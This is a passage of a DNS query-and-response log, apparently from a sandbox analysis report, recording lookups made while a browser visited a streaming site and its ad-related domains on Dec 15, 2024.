                                                                                                                                                                                          Dec 15, 2024 12:38:33.593018055 CET192.168.2.161.1.1.10xe5caStandard query (0)birthjeans.icu65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:40.916081905 CET192.168.2.161.1.1.10x845Standard query (0)nostop.go2cloud.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:40.916208029 CET192.168.2.161.1.1.10xac24Standard query (0)nostop.go2cloud.org65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:43.141911983 CET192.168.2.161.1.1.10x60d2Standard query (0)nostop.go2cloud.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:43.142046928 CET192.168.2.161.1.1.10x3e66Standard query (0)nostop.go2cloud.org65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:39:05.728461981 CET192.168.2.161.1.1.10x4ecStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:39:05.728555918 CET192.168.2.161.1.1.10xe0c5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 15, 2024 12:37:48.000804901 CET1.1.1.1192.168.2.160x6eb8No error (0)fsharetv.co104.21.10.158A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:48.000804901 CET1.1.1.1192.168.2.160x6eb8No error (0)fsharetv.co172.67.131.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:48.001053095 CET1.1.1.1192.168.2.160x5abdNo error (0)fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.404807091 CET1.1.1.1192.168.2.160xb944No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.405150890 CET1.1.1.1192.168.2.160xeaebNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.405150890 CET1.1.1.1192.168.2.160xeaebNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509407043 CET1.1.1.1192.168.2.160x9c6cNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509435892 CET1.1.1.1192.168.2.160xf8d9No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509435892 CET1.1.1.1192.168.2.160xf8d9No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.509435892 CET1.1.1.1192.168.2.160xf8d9No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.711369991 CET1.1.1.1192.168.2.160xad87No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.711385965 CET1.1.1.1192.168.2.160x860fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533595085 CET1.1.1.1192.168.2.160x834fNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533595085 CET1.1.1.1192.168.2.160x834fNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533595085 CET1.1.1.1192.168.2.160x834fNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533595085 CET1.1.1.1192.168.2.160x834fNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533595085 CET1.1.1.1192.168.2.160x834fNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.533726931 CET1.1.1.1192.168.2.160x7a8No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.534138918 CET1.1.1.1192.168.2.160x511dNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.535406113 CET1.1.1.1192.168.2.160xb09fNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.535406113 CET1.1.1.1192.168.2.160xb09fNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.535406113 CET1.1.1.1192.168.2.160xb09fNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.839101076 CET1.1.1.1192.168.2.160xbe74No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.839101076 CET1.1.1.1192.168.2.160xbe74No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.105A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.839101076 CET1.1.1.1192.168.2.160xbe74No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.36A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.839101076 CET1.1.1.1192.168.2.160xbe74No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.176A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:54.303504944 CET1.1.1.1192.168.2.160xe86cNo error (0)fsharetv.co172.67.131.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:54.303504944 CET1.1.1.1192.168.2.160xe86cNo error (0)fsharetv.co104.21.10.158A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:54.303527117 CET1.1.1.1192.168.2.160xc47eNo error (0)fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.502136946 CET1.1.1.1192.168.2.160x8234No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.502136946 CET1.1.1.1192.168.2.160x8234No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.503253937 CET1.1.1.1192.168.2.160x77efNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.811604977 CET1.1.1.1192.168.2.160xd47No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.811604977 CET1.1.1.1192.168.2.160xd47No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.811604977 CET1.1.1.1192.168.2.160xd47No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.811604977 CET1.1.1.1192.168.2.160xd47No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.811604977 CET1.1.1.1192.168.2.160xd47No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.813888073 CET1.1.1.1192.168.2.160x82efNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.986377954 CET1.1.1.1192.168.2.160x5783No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.986377954 CET1.1.1.1192.168.2.160x5783No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.176A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.986377954 CET1.1.1.1192.168.2.160x5783No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.36A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.986377954 CET1.1.1.1192.168.2.160x5783No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.105A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.994879007 CET1.1.1.1192.168.2.160xafa8No error (0)ukankingwithea.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.995004892 CET1.1.1.1192.168.2.160x2984No error (0)ukankingwithea.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.002590895 CET1.1.1.1192.168.2.160x6c3aNo error (0)bineukdwithme.com172.67.183.159A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.002590895 CET1.1.1.1192.168.2.160x6c3aNo error (0)bineukdwithme.com104.21.83.249A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.003467083 CET1.1.1.1192.168.2.160x1e61No error (0)bineukdwithme.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004781008 CET1.1.1.1192.168.2.160x33b7No error (0)getrunkhomuto.info108.158.75.43A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004781008 CET1.1.1.1192.168.2.160x33b7No error (0)getrunkhomuto.info108.158.75.55A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004781008 CET1.1.1.1192.168.2.160x33b7No error (0)getrunkhomuto.info108.158.75.125A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004781008 CET1.1.1.1192.168.2.160x33b7No error (0)getrunkhomuto.info108.158.75.121A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004801035 CET1.1.1.1192.168.2.160x8be3No error (0)ghabovethec.info18.165.220.113A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004801035 CET1.1.1.1192.168.2.160x8be3No error (0)ghabovethec.info18.165.220.27A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004801035 CET1.1.1.1192.168.2.160x8be3No error (0)ghabovethec.info18.165.220.87A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.004801035 CET1.1.1.1192.168.2.160x8be3No error (0)ghabovethec.info18.165.220.127A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.013758898 CET1.1.1.1192.168.2.160xc508No error (0)arketingefifortw.com13.227.8.77A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.013758898 CET1.1.1.1192.168.2.160xc508No error (0)arketingefifortw.com13.227.8.96A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.013758898 CET1.1.1.1192.168.2.160xc508No error (0)arketingefifortw.com13.227.8.66A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:58.013758898 CET1.1.1.1192.168.2.160xc508No error (0)arketingefifortw.com13.227.8.8A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:59.402302980 CET1.1.1.1192.168.2.160x7e67No error (0)images.fsharetv.co172.67.131.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:59.402302980 CET1.1.1.1192.168.2.160x7e67No error (0)images.fsharetv.co104.21.10.158A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:59.403417110 CET1.1.1.1192.168.2.160x6859No error (0)images.fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.499242067 CET1.1.1.1192.168.2.160x4546No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.105A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.499242067 CET1.1.1.1192.168.2.160x4546No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.176A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.499242067 CET1.1.1.1192.168.2.160x4546No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.36A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.499242067 CET1.1.1.1192.168.2.160x4546No error (0)d2w9cdu84xc4eq.cloudfront.net108.158.71.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:02.678359985 CET1.1.1.1192.168.2.160xd995No error (0)images.fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:02.682595968 CET1.1.1.1192.168.2.160xd13cNo error (0)images.fsharetv.co172.67.131.140A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:02.682595968 CET1.1.1.1192.168.2.160xd13cNo error (0)images.fsharetv.co104.21.10.158A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:05.862855911 CET1.1.1.1192.168.2.160x30ceNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.529710054 CET1.1.1.1192.168.2.160x1f31No error (0)arketingefifortw.com13.227.8.8A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.529710054 CET1.1.1.1192.168.2.160x1f31No error (0)arketingefifortw.com13.227.8.77A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.529710054 CET1.1.1.1192.168.2.160x1f31No error (0)arketingefifortw.com13.227.8.96A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.529710054 CET1.1.1.1192.168.2.160x1f31No error (0)arketingefifortw.com13.227.8.66A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.283617973 CET1.1.1.1192.168.2.160x49feNo error (0)youtube-ui.l.google.com172.217.19.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.284400940 CET1.1.1.1192.168.2.160x5819No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.284400940 CET1.1.1.1192.168.2.160x5819No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.356386900 CET1.1.1.1192.168.2.160x2f8bNo error (0)getrunkhomuto.info108.158.75.125A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.356386900 CET1.1.1.1192.168.2.160x2f8bNo error (0)getrunkhomuto.info108.158.75.55A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.356386900 CET1.1.1.1192.168.2.160x2f8bNo error (0)getrunkhomuto.info108.158.75.121A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.356386900 CET1.1.1.1192.168.2.160x2f8bNo error (0)getrunkhomuto.info108.158.75.43A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.208981991 CET1.1.1.1192.168.2.160x7a91No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.208981991 CET1.1.1.1192.168.2.160x7a91No error (0)star-mini.c10r.facebook.com157.240.195.35A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.210206032 CET1.1.1.1192.168.2.160x3ceaNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.210206032 CET1.1.1.1192.168.2.160x3ceaNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.210206032 CET1.1.1.1192.168.2.160x3ceaNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.19.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944370031 CET1.1.1.1192.168.2.160xf936No error (0)youtube-ui.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944485903 CET1.1.1.1192.168.2.160xbc3bNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.944485903 CET1.1.1.1192.168.2.160xbc3bNo error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.719894886 CET1.1.1.1192.168.2.160x768No error (0)lgzmq.employmehnt.comkenwellsgrpo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.719894886 CET1.1.1.1192.168.2.160x768No error (0)kenwellsgrpo.com54.225.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.719894886 CET1.1.1.1192.168.2.160x768No error (0)kenwellsgrpo.com34.195.224.242A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.720535994 CET1.1.1.1192.168.2.160x7c61No error (0)lgzmq.employmehnt.comkenwellsgrpo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:16.322681904 CET1.1.1.1192.168.2.160x17a4No error (0)bineukdwithme.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:16.322778940 CET1.1.1.1192.168.2.160x50d3No error (0)bineukdwithme.com104.21.83.249A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:16.322778940 CET1.1.1.1192.168.2.160x50d3No error (0)bineukdwithme.com172.67.183.159A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.285782099 CET1.1.1.1192.168.2.160x5835No error (0)lgzmq.employmehnt.comkenwellsgrpo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.285782099 CET1.1.1.1192.168.2.160x5835No error (0)kenwellsgrpo.com54.225.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.285782099 CET1.1.1.1192.168.2.160x5835No error (0)kenwellsgrpo.com34.195.224.242A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.286474943 CET1.1.1.1192.168.2.160xdde8No error (0)lgzmq.employmehnt.comkenwellsgrpo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.850042105 CET1.1.1.1192.168.2.160x329cNo error (0)ukankingwithea.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.854989052 CET1.1.1.1192.168.2.160xef11No error (0)ukankingwithea.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.987565994 CET1.1.1.1192.168.2.160x2837No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.987565994 CET1.1.1.1192.168.2.160x2837No error (0)star-mini.c10r.facebook.com157.240.195.35A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.988785982 CET1.1.1.1192.168.2.160xc0ccNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.988785982 CET1.1.1.1192.168.2.160xc0ccNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.988785982 CET1.1.1.1192.168.2.160xc0ccNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:33.735682011 CET1.1.1.1192.168.2.160xbdbNo error (0)birthjeans.icu172.67.161.217A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:33.735682011 CET1.1.1.1192.168.2.160xbdbNo error (0)birthjeans.icu104.21.42.119A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:33.739510059 CET1.1.1.1192.168.2.160xe5caNo error (0)birthjeans.icu65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:41.054580927 CET1.1.1.1192.168.2.160x845No error (0)nostop.go2cloud.org18.202.12.61A (IP address)IN (0x0001)false
